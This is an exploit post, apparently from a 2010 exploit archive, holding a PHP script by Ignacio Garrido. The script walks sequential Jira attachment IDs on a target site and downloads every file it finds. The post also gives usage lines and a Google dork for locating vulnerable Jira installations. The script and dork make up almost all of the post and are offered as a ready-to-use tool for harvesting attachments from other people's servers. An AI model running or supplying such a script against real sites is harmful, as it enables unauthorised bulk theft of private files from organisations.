Jira Atlassian File Attachment Download
Posted on 30 March 2010
======================================= Jira Atlassian File Attachment Download ======================================= # Exploit Title: Jira Atlassian # Date: 28/3/2010 # Author: Ignacio Garrido # Mail: Ign.sec gmail com # Software Link: http://www.atlassian.com/software/jira/JIRADownloadCenter.jspa # Version: 3.X (Maybe 4.X) # Tested on: Windos & Linux # Code : <?php /*If it's a https, you MUST especify it on the URL or it won't work. Try using numbers that you get from your results in google otherwise you will get a lot of 404*/ echo " ######################################################### ################### # #Attachment downloader by Scuarplex #"; if ($argc != 4){echo " #Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER) # #Dork: inurl:/jira/secure/attachment/ # #Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/ 1 12310371# ############################################################################ ";die;} else{ echo " #Let's start! "; echo "# #Ign.sec@Gmail.com "; # ############################################################################ ";} $url2 = $argv[1]; if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://") { $url = ("http://".$url2); } else { $url = $argv[1]; } if ($argv[2] >= $argv[3]) { echo " #The second number must be bigger than the first one "; die; } $numero = $argv[2]; for ($numero;$numero <= $argv[3];$numero++) { $head = get_headers("$url$numero/"); if (substr ($head[0],9,3) == "404") { echo " #File number $numero not found! (404) "; } else{ $explodeo = explode("filename*=",$head[2]); $explodeo2 = explode(";",$explodeo[1]); $archivo = substr($explodeo2[0],7); echo " #Downloading file: $archivo "; $file=file_get_contents("$url$numero/$archivo"); file_put_contents($archivo,$file); } } echo " #All attachment downloaded correctly! "; die; ?> # Inj3ct0r.com [2010-03-30]
